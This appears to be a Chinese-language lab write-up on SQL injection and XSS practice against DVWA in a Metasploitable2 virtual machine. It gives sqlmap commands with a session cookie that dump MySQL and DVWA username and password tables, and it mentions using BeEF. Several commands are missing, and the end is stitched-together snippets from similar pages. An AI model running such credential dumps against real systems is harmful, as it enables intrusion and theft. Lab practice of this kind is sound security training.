2、 kali使用beef生成惡意**
在這裡使用beef工具時出現了錯誤,不能使用預設的賬號和密碼,檔案中新增乙個賬號即可
二、sql注入實驗
實驗環境:
實驗裝置:一台kali虛擬機器, 一台metasploitable2虛擬機器(均採用橋接方式)
在kali中訪問metasploitable2的dvwa,將安全等級跳到low,不然不會有注入漏洞。
除錯好之後,進行注入,第一次輸入 1,第二次輸入 1』 。兩次顯回不一樣,存在注入漏洞。
在輸入1的頁面按f12得出cookie
列舉當前使用的資料庫名稱和使用者名稱
使用下列命令
列舉資料庫使用者名稱和密碼
使用下列命令
列舉資料庫
使用下列命令
列舉資料庫和指定資料庫的資料表
使用下列命令
獲取指定資料庫和表中所有列的資訊
訪問mysql資料庫user表單
使用下列命令
sqlmap -u 『10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&submit=submit#』 --cookie=『security=low; phpsessid=911e4c015aab9e4a3f52c8b57ab3a472』 -d mysql -t user -c user,password --dump
訪問dvwa資料庫users表單,即我們的登陸賬號資訊
使用下列命令
sqlmap -u 『10.70.120.146/dvwa/vulnerabilities/sqli/?id=1&submit=submit#』 --cookie=『security=low; phpsessid=911e4c015aab9e4a3f52c8b57ab3a472』 -d dvwa -t users -c user,password --dump
儲存在本地的檔案,用root許可權開啟便可以看到
實驗三 XSS與SQL注入
單引號 用於指示字串型資料 見select 逗號 分割相同的項 見select 5 回答問題 實驗中xss攻擊屬於哪種型別?儲存型xss攻擊 下頁還有sql注入,請繼續 sql注入部分 dvwa sqlmap mysql注入實戰 你輸入的命令 sqlmap u cookie security low...
XSS和SQL注入
單引號 用於指示字串型資料 見select 逗號 分割相同的項 見select 2 kali使用beef生成惡意 5 回答問題 實驗中xss攻擊屬於哪種型別?反射型xss 實驗環境搭建。啟動metasploitable2虛擬機器。1 注入點發現。首先肯定是要判斷是否有注入漏洞。在輸入框輸入1,返回 ...
sql注入和xss攻擊
sql注入 就是通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。具體來說,它是利用現有應用程式,將 惡意的 sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,而不...